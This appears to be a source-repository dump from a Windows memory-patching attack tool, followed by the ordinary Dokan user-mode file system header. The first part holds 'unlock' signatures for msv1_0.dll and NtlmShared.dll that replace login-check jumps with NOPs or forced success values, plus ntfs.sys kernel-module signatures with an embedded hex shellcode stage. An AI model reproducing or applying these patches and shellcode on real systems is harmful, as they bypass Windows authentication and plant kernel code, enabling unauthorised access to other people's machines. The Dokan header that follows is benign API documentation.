# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2067 / 2023-07-11]
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2506 / 2023-10-19]
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2567 / 2023-10-14]
FC9,488D4B1048FF152C230000,FDC,0F85C4FAFFFF,FDC,909090909090
#
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.1 / 2024-04-01]
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.1150 / 2024-07-03]
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.1591 / 2024-08-21]
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.1882 / 2024-09-28]
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.2454 / 2024-11-16]
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.712 / 2024-05-16]
B31,4D2BF575EF84D2740A32C0EB09,B3A,32C0,B3A,B001
#
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.2894 / 2025-01-12]
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.3037 / 2025-01-24]
6A1,4D2BFE75EF84D20F8442F8FFFF32C0E93EF8FFFF,6AE,32C0,6AE,B001
#
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.3323 / 2025-02-21]
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.3624 / 2025-03-22]
6C1,4D2BFE75EF84D20F8442F8FFFF32C0E93EF8FFFF,6CE,32C0,6CE,B001
================================================
FILE: files/unlock_win8x64.sig
================================================
# unlock signatures for Windows 8.1
# syntax: see signature_info.txt for more information.
#
#
# signature for Windows 8.1 x64 [msv1_0.dll (signed on: 2014-10-29)]
EE0,FF1542A4,EE9,0F854688,EE9,909090909090
#
# signature for Windows 8.1 x64 [msv1_0.dll (signed on: 2015-10-30)]
B60,FF15C207,B69,0F85CEBC,B69,909090909090
#
# signature for Windows 8.1 x64 [msv1_0.dll (signed on: 2016-03-16)]
F00,FF152204,F09,0F85B2B9,F09,909090909090
================================================
FILE: files/unlock_winvistax64.sig
================================================
# unlock signatures for Windows Vista x64 version
# syntax: see signature_info.txt for more information.
#
#
# signature for Windows Vista x64 [msv1_0.dll 6.0.6002.18005]
1a1,c60f85,1a8,b8,1a2,909090909090
#
# signature for Windows Vista x64 [msv1_0.dll 6.0.6002.19431]
d89,c60f85,d90,b8,d8a,909090909090
================================================
FILE: files/win7x64.kmd
================================================
# signatures for Windows 7 x64 version
#
#
# ntfs.sys signed on 2010-11-20 14:33:45 (MJ_CREATE) | (WIN7SP1-INSTALL)
7F0,488954241048894C240853565741544155415641574881EC70010000488BF248,000,C14133C24103C7468D84084F7EA86F418BC2F7D041C1C0064403C1410BC033C1,A87F0,DEFAULT_WINX64_STAGE1,44E00,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3
#
#
# ntfs.sys signed on 2013-04-12 16:16:03 (MJ_CREATE)
680,488954241048894C240853565741544155415641574881EC70010000488BF248,940,48895C2408574883EC708B118B4104488BF9895158C1EA0389415C83E23F41B8,AA680,DEFAULT_WINX64_STAGE1,44E00,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3
#
#
# ntfs.sys signed on 2014-01-24 04:37:56 (MJ_CREATE)
990,488954241048894C240853565741544155415641574881EC70010000488BF248,000,C14133C04133C20344240C448D8C106556ACC48BC1F7D041C1C1174503C8410B,A7990,DEFAULT_WINX64_STAGE1,44E00,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3
#
#
# ntfs.sys signed on 2016-01-08 20:19:54 (MJ_CREATE)
BD0,488954241048894C240853565741544155415641574881EC70010000488BF248,000,C14133C24103C4428D940053144402C1C20903D18BC233C14123C233C103C346,A7BD0,DEFAULT_WINX64_STAGE1,44E00,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3
#
#
# ntfs.sys signed on 2016-01-11 20:10:19 (MJ_CREATE)
AA0,488954241048894C240853565741544155415641574881EC70010000488BF248,000,468D8408F87CA21F8BC141C1C0104403C14133C04133C20344240C448D8C1065,A7AA0,DEFAULT_WINX64_STAGE1,44E00,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3
#
#
# ntfs.sys [6.1.7601.23839] signed on 2017-07-09 16:32:49 (MJ_CREATE/NtfsFsdCreate)
380,488954241048894C240853565741544155415641574881EC70010000488BF248,000,03D14123C24133C04103C48D8C10B15BFFFF8B532C8B5B3CC1C1118954240841,A7380,DEFAULT_WINX64_STAGE1,44E00,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3
#
#
# ntfs.sys [6.1.7601.23932] signed on 2017-10-17 00:07:00 (MJ_CREATE/NtfsFsdCreate)
3D0,488954241048894C240853565741544155415641574881EC70010000488BF248,000,FFFF8B532C8B5B3CC1C11189542408418BC24133C14103CA23C14133C103C246,A73D0,DEFAULT_WINX64_STAGE1,44E00,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3
#
#
# ntfs.sys [6.1.7601.24000] signed on 2018-08-08 03:20:35 (MJ_CREATE/NtfsFsdCreate)
# ntfs.sys [6.1.7601.24335] signed on 2018-12-28 21:02:08 (MJ_CREATE/NtfsFsdCreate)
390,488954241048894C240853565741544155415641574881EC70010000488BF248,000,11906B8BC14133C3C1C2074103D323C233C14103C5468D8410937198FD418BC3,A7390,DEFAULT_WINX64_STAGE1,44E00,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3
# ntfs.sys [6.1.7601.24382] signed on 2019-02-10 18:10:39 (MJ_CREATE/NtfsFsdCreate)
370,488954241048894C240853565741544155415641574881EC70010000488BF248,000,8bc24133c14103ca23c14133c103c2468d9c00bed75c89418bc233c141c1c316,A7370,DEFAULT_WINX64_STAGE1,44E00,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3
================================================
FILE: files/winvistax64.kmd
================================================
# kernel module (kmd) signatures for Windows Vista x64 version (ntfs.sys based; same layout as win7x64.kmd - not unlock signatures)
# syntax: see signature_info.txt for more information.
#
# NB! stage2 code differs slightly from other winx64 code (extra stack alignment around MmGetPhysicalAddress to avoid bluescreen)
#
# signature for Windows Vista x64 SP2 [ntfs.sys (signed on: 2009-04-11)]
2df,0f82b0b7,0ec,80e85efd,ae290,DEFAULT_WINX64_STAGE1,45d00,eb12000000000000000000000000000000000000584883e805505152415041510f20c15181e1fffffeff0f22c1488b15d4ffffff488910b000b201488d0dc0fffffff00fb0117522415441554883ec200f010c24488b4c2402488b4904e8b40000004883c420415d415c580f22c0415941585a59c35657488bf14833ff4833c0fcac84c07407c1cf0d03f8ebf48bc75f5ec348c1e90c48c1e10cb800100000482bc8668b01663d4d5a75ef8b413c3d0010000077e54803c18b003d5045000075d9488bc1c357568b793c8bbc39880000004803f9448b47184833f68b47204803c18b04b04803c151488bc8e885ffffff593bc2740548ffc6ebe18b57244803d14833c0668b04728b571c4803d18b04824803c15e5fc3e877ffffff4c8be0498bccbabc1e369fe89affffff48c7c10020000048c7c2ffffff7fffd04c8be84833c0b900040000ffc9498944cd0075f74d89650848b8488d05f1ffffff484989850010000048b88b004883f80074f0498985081000004155b8001000004903c5506a004883ec20498bccba026ba094e832ffffff498bcd48c7c2ffff1f004d33c04d33c9ffd04883c438498bccba5763325ae80fffffffc8200000498bcdffd0c989053efeffffc3,0,DEFAULT_WINX64_STAGE3
#
# signature for Windows Vista x64 SP2 [ntfs.sys (signed on: 2013-03-03)]
25f,0f82b0b5,08c,80e85efd,ae210,DEFAULT_WINX64_STAGE1,45d00,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,0,DEFAULT_WINX64_STAGE3
================================================
FILE: includes/dokan.h
================================================
/*
Dokan : user-mode file system library for Windows
Copyright (C) 2015 - 2019 Adrien J. <liryna.stark@gmail.com> and Maxime C. <maxime@islog.com>
Copyright (C) 2020 Google, Inc.
Copyright (C) 2007 - 2011 Hiroki Asakawa <info@dokan-dev.net>
http://dokan-dev.github.io
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU Lesser General Public License as published by the Free
Software Foundation; either version 3 of the License, or (at your option) any
later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU Lesser General Public License along
with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef DOKAN_H_
#define DOKAN_H_
/** Do not include NTSTATUS. Fix duplicate preprocessor definitions */
#define WIN32_NO_STATUS
#include <windows.h>
#undef WIN32_NO_STATUS
#include <ntstatus.h>
#include "fileinfo.h"
#include "public.h"
#ifdef _EXPORTING
/** Building the Dokan library itself: export the API (see also dokan.def for the export list). */
#define DOKANAPI __stdcall
#else
/** Consuming the Dokan library (the case for this project): import the API from the Dokan DLL. */
#define DOKANAPI __declspec(dllimport) __stdcall
#endif
/** Calling convention for every callback in DOKAN_OPERATIONS (stdcall). */
#define DOKAN_CALLBACK __stdcall
#ifdef __cplusplus
extern "C" {
#endif
/** @file */
/**
* \defgroup Dokan Dokan
* \brief Dokan Library const and methods
*/
/** @{ */
/** The current Dokan version (200 means ver 2.0.0). Put this in \ref DOKAN_OPTIONS.Version. */
#define DOKAN_VERSION 200
/** Minimum Dokan version (ver 2.0.0) accepted in \ref DOKAN_OPTIONS.Version. */
#define DOKAN_MINIMUM_COMPATIBLE_VERSION 200
/**
 * Driver file name including the DOKAN_MAJOR_API_VERSION.
 * NOTE(review): DOKAN_MAJOR_API_VERSION is not defined in this header; it is expected
 * from one of the included headers (public.h / fileinfo.h) - confirm before relying on it.
 */
#define DOKAN_DRIVER_NAME L"dokan" DOKAN_MAJOR_API_VERSION L".sys"
/** Network provider name including the DOKAN_MAJOR_API_VERSION (same caveat as above). */
#define DOKAN_NP_NAME L"Dokan" DOKAN_MAJOR_API_VERSION
/** @} */
/**
* \defgroup DOKAN_OPTION DOKAN_OPTION
* \brief All DOKAN_OPTION flags used in DOKAN_OPTIONS.Options
* \see DOKAN_FILE_INFO
*/
/** @{ */
/** Enable output of debug messages. */
#define DOKAN_OPTION_DEBUG 1
/** Enable output of debug messages to stderr. */
#define DOKAN_OPTION_STDERR (1 << 1)
/**
 * Enable the use of alternate stream paths in the form
 * <file-name>:<stream-name>. If this is not specified then the driver will
 * fail any attempt to access a path with a colon.
 */
#define DOKAN_OPTION_ALT_STREAM (1 << 2)
/** Mount the drive write-protected. */
#define DOKAN_OPTION_WRITE_PROTECT (1 << 3)
/** Use network drive - Dokan network provider needs to be installed */
#define DOKAN_OPTION_NETWORK (1 << 4)
/**
 * Use removable drive
 * Be aware that on some environments, the userland application will be denied
 * to communicate with the drive which will result in an unwanted unmount.
 * \see <a href="https://github.com/dokan-dev/dokany/issues/843">Issue #843</a>
 */
#define DOKAN_OPTION_REMOVABLE (1 << 5)
/**
 * Use Windows Mount Manager.
 * This option is highly recommended for better system integration.
 *
 * If a drive letter is used but is busy, Mount Manager will assign one for us and
 * the \ref DOKAN_OPERATIONS.Mounted parameters will contain the new mount point.
 */
#define DOKAN_OPTION_MOUNT_MANAGER (1 << 6)
/** Mount the drive on the current session only */
#define DOKAN_OPTION_CURRENT_SESSION (1 << 7)
/** Enable user-mode LockFile/UnlockFile callbacks (\ref DOKAN_OPERATIONS.LockFile). Otherwise Dokan takes care of locking itself. */
#define DOKAN_OPTION_FILELOCK_USER_MODE (1 << 8)
/**
 * Enable case-sensitive paths.
 * By default all paths are case insensitive.
 * For case sensitive: \dir\File & \diR\file are different files
 * but for case insensitive they are the same.
 */
#define DOKAN_OPTION_CASE_SENSITIVE (1 << 9)
/** Allows unmounting of a network drive via Explorer */
#define DOKAN_OPTION_ENABLE_UNMOUNT_NETWORK_DRIVE (1 << 10)
/**
 * Forward the kernel driver global and volume logs to userland.
 * Can be very slow if \ref DOKAN_OPTIONS.SingleThread is enabled.
 */
#define DOKAN_OPTION_DISPATCH_DRIVER_LOGS (1 << 11)
/** @} */
/** Opaque handle type used by the Dokan API; what it refers to is defined by the library, not by this header. */
typedef VOID *DOKAN_HANDLE, **PDOKAN_HANDLE;
/**
 * \struct DOKAN_OPTIONS
 * \brief Dokan mount options used to describe Dokan device behavior.
 *
 * NOTE(review): this struct is handed to the Dokan DLL (see DOKANAPI) and carries a
 * Version field, so its field order and sizes are presumably an ABI contract -
 * do not reorder or resize fields.
 * \see DokanMain
 */
typedef struct _DOKAN_OPTIONS {
/** Version of the Dokan features requested, written without dots (version "123" equals Dokan 1.2.3). Normally \ref DOKAN_VERSION. */
USHORT Version;
/** Only use a single thread to process events. Strongly discouraged: it easily creates a bottleneck. */
BOOLEAN SingleThread;
/** Features enabled for the mount: bitwise OR of \ref DOKAN_OPTION flags. */
ULONG Options;
/** Free for the file system implementation to store anything here. */
ULONG64 GlobalContext;
/** Mount point. It can be a drive letter like "M:\" or a folder path "C:\mount\dokan" on an NTFS partition. */
LPCWSTR MountPoint;
/**
 * UNC Name for the Network Redirector
 * \see <a href="https://msdn.microsoft.com/en-us/library/windows/hardware/ff556761(v=vs.85).aspx">Support for UNC Naming</a>
 */
LPCWSTR UNCName;
/**
 * Max timeout in milliseconds of each request before Dokan gives up waiting for events to complete.
 * A request timeout is a sign that the userland implementation is no longer able to properly manage requests in time.
 * The driver will therefore unmount the device when a timeout triggers, in order to keep the system stable.
 * The default timeout value is 15 seconds.
 */
ULONG Timeout;
/** Allocation Unit Size of the volume. This will affect the file size. */
ULONG AllocationUnitSize;
/** Sector Size of the volume. This will affect the file size. */
ULONG SectorSize;
/**
 * Length in bytes of the optional VolumeSecurityDescriptor provided. 0 disables the option.
 * Must not exceed VOLUME_SECURITY_DESCRIPTOR_MAX_SIZE, the size of the inline buffer below.
 */
ULONG VolumeSecurityDescriptorLength;
/** Optional Volume Security descriptor (inline, fixed-size buffer). See <a href="https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-initializesecuritydescriptor">InitializeSecurityDescriptor</a> */
CHAR VolumeSecurityDescriptor[VOLUME_SECURITY_DESCRIPTOR_MAX_SIZE];
} DOKAN_OPTIONS, *PDOKAN_OPTIONS;
/**
 * \struct DOKAN_FILE_INFO
 * \brief Dokan file information on the current operation.
 *
 * One instance is passed as the trailing DokanFileInfo parameter of every
 * DOKAN_OPERATIONS callback. \ref Context (and \ref IsDirectory in ZwCreateFile)
 * are written by the file system; DokanContext and ProcessingContext are reserved.
 */
typedef struct _DOKAN_FILE_INFO {
/**
 * Context that can be used to carry information between operations.
 * The context can carry whatever type like \c HANDLE, struct, int,
 * internal reference that will help the implementation understand the request context of the event.
 * Release it in Cleanup / clear it in CloseFile (see those callbacks).
 */
ULONG64 Context;
/** Reserved. Used internally by Dokan library. Never modify. */
ULONG64 DokanContext;
/** A pointer to DOKAN_OPTIONS which was passed to \ref DokanMain or \ref DokanCreateFileSystem. */
PDOKAN_OPTIONS DokanOptions;
/**
 * Reserved. Used internally by Dokan library. Never modify.
 * If the processing for the event requires extra data to be associated with it
 * then a pointer to that data can be placed here
 */
PVOID ProcessingContext;
/**
 * Process ID for the thread that originally requested a given I/O operation.
 * NOTE(review): a PID identifies the requester only while that process lives;
 * do not cache it as a long-lived identity or base access decisions on it alone.
 */
ULONG ProcessId;
/**
 * Requesting a directory file.
 * Must be set in \ref DOKAN_OPERATIONS.ZwCreateFile if the file appears to be a folder.
 */
UCHAR IsDirectory;
/** Flag if the file has to be deleted during the DOKAN_OPERATIONS.Cleanup event. */
UCHAR DeleteOnClose;
/** Read or write is paging IO. */
UCHAR PagingIo;
/** Read or write is synchronous IO. */
UCHAR SynchronousIo;
/** Read or write directly from data source without cache */
UCHAR Nocache;
/** If \c TRUE, write to the current end of file instead of using the Offset parameter. */
UCHAR WriteToEndOfFile;
} DOKAN_FILE_INFO, *PDOKAN_FILE_INFO;
/*
 * Exception codes used by the Dokan library.
 * NOTE(review): meaning inferred from the names only (not initialized / initialization
 * failed / shutdown failed); this header does not say when they are raised.
 */
#define DOKAN_EXCEPTION_NOT_INITIALIZED 0x0f0ff0ff
#define DOKAN_EXCEPTION_INITIALIZATION_FAILED 0x0fbadbad
#define DOKAN_EXCEPTION_SHUTDOWN_FAILED 0x0fbadf00
/**
 * \brief FillFindData Used to add an entry in the FindFiles operation.
 * Called once per directory entry from \ref DOKAN_OPERATIONS.FindFiles / FindFilesWithPattern.
 * \return 1 if buffer is full, otherwise 0 (currently it never returns 1)
 */
typedef int(WINAPI *PFillFindData)(PWIN32_FIND_DATAW, PDOKAN_FILE_INFO);
/**
 * \brief FillFindStreamData Used to add an entry in FindStreams.
 * \return FALSE if the buffer is full, otherwise TRUE
 */
typedef BOOL(WINAPI *PFillFindStreamData)(PWIN32_FIND_STREAM_DATA, PVOID);
// clang-format off
/**
* \struct DOKAN_OPERATIONS
* \brief Dokan API callbacks interface
*
* DOKAN_OPERATIONS is a struct of callbacks that describe all Dokan API operations
* that will be called when Windows accesses the filesystem.
*
* If an error occurs, return NTSTATUS (https://support.microsoft.com/en-us/kb/113996).
* Win32 Error can be converted to \c NTSTATUS with \ref DokanNtStatusFromWin32
*
* All callbacks can be set to \c NULL or return \c STATUS_NOT_IMPLEMENTED
* if supporting one of them is not desired. Be aware that returning such values to important callbacks
* such as DOKAN_OPERATIONS.ZwCreateFile / DOKAN_OPERATIONS.ReadFile / ... would make the filesystem not work or become unstable.
*/
typedef struct _DOKAN_OPERATIONS {
/**
* \brief CreateFile Dokan API callback
*
* CreateFile is called each time a request is made on a file system object.
*
* In case \c OPEN_ALWAYS & \c CREATE_ALWAYS are successfully opening an
* existing file, \c STATUS_OBJECT_NAME_COLLISION should be returned instead of \c STATUS_SUCCESS .
* This will inform Dokan that the file has been opened and not created during the request.
*
* If the file is a directory, CreateFile is also called.
* In this case, CreateFile should return \c STATUS_SUCCESS when that directory
* can be opened and DOKAN_FILE_INFO.IsDirectory has to be set to \c TRUE.
* On the other hand, if DOKAN_FILE_INFO.IsDirectory is set to \c TRUE
* but the path targets a file, \c STATUS_NOT_A_DIRECTORY must be returned.
*
* DOKAN_FILE_INFO.Context can be used to store Data (like \c HANDLE)
* that can be retrieved in all other requests related to the Context.
* To avoid memory leak, Context needs to be released in DOKAN_OPERATIONS.Cleanup.
*
* NOTE(review): FileName is whatever path the kernel passes down for this volume.
* An implementation that maps it onto a backing store should validate/canonicalize
* it (e.g. reject ".." components) rather than trusting it as-is.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param SecurityContext SecurityContext, see https://msdn.microsoft.com/en-us/library/windows/hardware/ff550613(v=vs.85).aspx
* \param DesiredAccess Specifies an <a href="https://msdn.microsoft.com/en-us/library/windows/hardware/ff540466(v=vs.85).aspx">ACCESS_MASK</a> value that determines the requested access to the object.
* \param FileAttributes Specifies one or more FILE_ATTRIBUTE_XXX flags, which represent the file attributes to set if a file is created or overwritten.
* \param ShareAccess Type of share access, which is specified as zero or any combination of FILE_SHARE_* flags.
* \param CreateDisposition Specifies the action to perform if the file does or does not exist.
* \param CreateOptions Specifies the options to apply when the driver creates or opens the file.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see <a href="https://msdn.microsoft.com/en-us/library/windows/hardware/ff566424(v=vs.85).aspx">See ZwCreateFile for more information about the parameters of this callback (MSDN).</a>
* \see DokanMapKernelToUserCreateFileFlags
*/
NTSTATUS(DOKAN_CALLBACK *ZwCreateFile)(LPCWSTR FileName,
PDOKAN_IO_SECURITY_CONTEXT SecurityContext,
ACCESS_MASK DesiredAccess,
ULONG FileAttributes,
ULONG ShareAccess,
ULONG CreateDisposition,
ULONG CreateOptions,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief Cleanup Dokan API callback
*
* Cleanup request before \ref CloseFile is called.
*
* When DOKAN_FILE_INFO.DeleteOnClose is \c TRUE, the file in Cleanup must be deleted.
* The function cannot fail, therefore the filesystem needs to ensure ahead of time
* (in \ref DeleteFile / \ref DeleteDirectory) that the delete can safely happen during Cleanup.
* See DeleteFile documentation for explanation.
*
* This is also the documented place to release DOKAN_FILE_INFO.Context (see \ref ZwCreateFile).
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param DokanFileInfo Information about the file or directory.
* \see DeleteFile
* \see DeleteDirectory
*/
void(DOKAN_CALLBACK *Cleanup)(LPCWSTR FileName,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief CloseFile Dokan API callback
*
* Clean remaining Context
*
* CloseFile is called at the end of the life of the context, after \ref Cleanup.
* Anything remaining in \ref DOKAN_FILE_INFO.Context must be cleared before returning:
* Cleanup is where Context is normally released (see \ref ZwCreateFile), CloseFile is the last chance.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param DokanFileInfo Information about the file or directory.
*/
void(DOKAN_CALLBACK *CloseFile)(LPCWSTR FileName,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief ReadFile Dokan API callback
*
* ReadFile callback on the file previously opened in DOKAN_OPERATIONS.ZwCreateFile.
* It can be called by different threads at the same time, so the read/context has to be thread safe.
*
* Buffer holds BufferLength bytes: never write more than that into it, and report
* the number of bytes actually produced (at most BufferLength) in *ReadLength.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param Buffer Read buffer that has to be filled with the read result.
* \param BufferLength Buffer length and read size to continue with.
* \param ReadLength Total data size that has been read.
* \param Offset Offset from where the read has to be continued.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see WriteFile
*/
NTSTATUS(DOKAN_CALLBACK *ReadFile)(LPCWSTR FileName,
LPVOID Buffer,
DWORD BufferLength,
LPDWORD ReadLength,
LONGLONG Offset,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief WriteFile Dokan API callback
*
* WriteFile callback on the file previously opened in DOKAN_OPERATIONS.ZwCreateFile
* It can be called by different threads at the same time, so the write/context has to be thread safe.
*
* Buffer is read-only input of NumberOfBytesToWrite bytes; do not read past it, and
* report the count actually written in *NumberOfBytesWritten.
* See DOKAN_FILE_INFO.WriteToEndOfFile, which overrides Offset when \c TRUE.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param Buffer Data that has to be written.
* \param NumberOfBytesToWrite Buffer length and write size to continue with.
* \param NumberOfBytesWritten Total number of bytes that have been written.
* \param Offset Offset from where the write has to be continued.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see ReadFile
*/
NTSTATUS(DOKAN_CALLBACK *WriteFile)(LPCWSTR FileName,
LPCVOID Buffer,
DWORD NumberOfBytesToWrite,
LPDWORD NumberOfBytesWritten,
LONGLONG Offset,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief FlushFileBuffers Dokan API callback
*
* Clears buffers for this context and causes any buffered data to be written to the file,
* i.e. the kernel asks that pending writes for this Context are committed.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
*/
NTSTATUS(DOKAN_CALLBACK *FlushFileBuffers)(LPCWSTR FileName,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief GetFileInformation Dokan API callback
*
* Get specific information on a file.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param Buffer Caller-provided BY_HANDLE_FILE_INFORMATION struct to fill.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
*/
NTSTATUS(DOKAN_CALLBACK *GetFileInformation)(LPCWSTR FileName,
LPBY_HANDLE_FILE_INFORMATION Buffer,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief FindFiles Dokan API callback
*
* List all files in the requested path by calling FillFindData once per entry.
* \ref DOKAN_OPERATIONS.FindFilesWithPattern is checked first. If it is not implemented or
* returns \c STATUS_NOT_IMPLEMENTED, then FindFiles is called, if implemented.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param FillFindData Callback that has to be called with a PWIN32_FIND_DATAW that contains file information.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see FindFilesWithPattern
*/
NTSTATUS(DOKAN_CALLBACK *FindFiles)(LPCWSTR FileName,
PFillFindData FillFindData,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief FindFilesWithPattern Dokan API callback
*
* Same as \ref DOKAN_OPERATIONS.FindFiles but with a search pattern.\n
* The search pattern is a Windows MS-DOS-style expression.
* It can contain wild cards and extended characters or none of them. See \ref DokanIsNameInExpression.
*
* If the function is not implemented (or returns \c STATUS_NOT_IMPLEMENTED), \ref DOKAN_OPERATIONS.FindFiles
* will be called instead and the result will be filtered internally by the library.
*
* \param PathName Path requested by the Kernel on the FileSystem.
* \param SearchPattern Search pattern.
* \param FillFindData Callback that has to be called with a PWIN32_FIND_DATAW that contains file information.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see FindFiles
* \see DokanIsNameInExpression
*/
NTSTATUS(DOKAN_CALLBACK *FindFilesWithPattern)(LPCWSTR PathName,
LPCWSTR SearchPattern,
PFillFindData FillFindData,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief SetFileAttributes Dokan API callback
*
* Set file attributes on a specific file.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param FileAttributes FILE_ATTRIBUTE_XXX flags to set on the file.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
*/
NTSTATUS(DOKAN_CALLBACK *SetFileAttributes)(LPCWSTR FileName,
DWORD FileAttributes,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief SetFileTime Dokan API callback
*
* Set the creation, last-access and last-write times of a specific file.
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param CreationTime Creation FILETIME.
* \param LastAccessTime LastAccess FILETIME.
* \param LastWriteTime LastWrite FILETIME.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
*/
NTSTATUS(DOKAN_CALLBACK *SetFileTime)(LPCWSTR FileName,
CONST FILETIME *CreationTime,
CONST FILETIME *LastAccessTime,
CONST FILETIME *LastWriteTime,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief DeleteFile Dokan API callback
*
* Check whether it is possible to delete a file.
*
* DeleteFile will also be called with DOKAN_FILE_INFO.DeleteOnClose set to \c FALSE
* to notify the driver when the file is no longer requested to be deleted.
*
* The file in DeleteFile should not be deleted, but instead the file
* must be checked as to whether or not it can be deleted,
* and \c STATUS_SUCCESS should be returned (when it can be deleted) or
* appropriate error codes, such as \c STATUS_ACCESS_DENIED or
* \c STATUS_OBJECT_NAME_NOT_FOUND, should be returned.
*
* When \c STATUS_SUCCESS is returned, a Cleanup call is received afterwards with
* DOKAN_FILE_INFO.DeleteOnClose set to \c TRUE. Only then must the closing file
* be deleted (Cleanup cannot fail, so do the checking here).
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see DeleteDirectory
* \see Cleanup
*/
NTSTATUS(DOKAN_CALLBACK *DeleteFile)(LPCWSTR FileName,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief DeleteDirectory Dokan API callback
*
* Check whether it is possible to delete a directory.
*
* DeleteDirectory will also be called with DOKAN_FILE_INFO.DeleteOnClose set to \c FALSE
* to notify the driver when the directory is no longer requested to be deleted.
*
* The Directory in DeleteDirectory should not be deleted, but instead
* must be checked as to whether or not it can be deleted,
* and \c STATUS_SUCCESS should be returned (when it can be deleted) or
* appropriate error codes, such as \c STATUS_ACCESS_DENIED,
* \c STATUS_OBJECT_PATH_NOT_FOUND, or \c STATUS_DIRECTORY_NOT_EMPTY, should
* be returned.
*
* When \c STATUS_SUCCESS is returned, a Cleanup call is received afterwards with
* DOKAN_FILE_INFO.DeleteOnClose set to \c TRUE. Only then must the closing directory
* be deleted (Cleanup cannot fail, so do the checking here).
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or \c NTSTATUS appropriate to the request result.
* \see DeleteFile
* \see Cleanup
*/
NTSTATUS(DOKAN_CALLBACK *DeleteDirectory)(LPCWSTR FileName,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief MoveFile Dokan API callback
*
* Move a file or directory to a new destination.
*
* NOTE(review): both paths are kernel-supplied; an implementation backed by a real
* store should validate NewFileName the same way as FileName in \ref ZwCreateFile.
*
* \param FileName Path for the file to be moved.
* \param NewFileName Path for the new location of the file.
* \param ReplaceIfExisting If destination already exists, can it be replaced?
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
*/
NTSTATUS(DOKAN_CALLBACK *MoveFile)(LPCWSTR FileName,
LPCWSTR NewFileName,
BOOL ReplaceIfExisting,
PDOKAN_FILE_INFO DokanFileInfo);
/**
* \brief SetEndOfFile Dokan API callback
*
* SetEndOfFile is used to truncate or extend a file (physical file size).
*
* \param FileName File path requested by the Kernel on the FileSystem.
* \param ByteOffset New file length in bytes.
* \param DokanFileInfo Information about the file or directory.
* \return \c STATUS_SUCCESS on success or NTSTATUS appropriate to the request result.
* \see SetAllocationSize
*/
NTSTATUS(DOKAN_CALLBACK *SetEndOfFile)(LPCWSTR FileName,
LONGLONG ByteOffset,
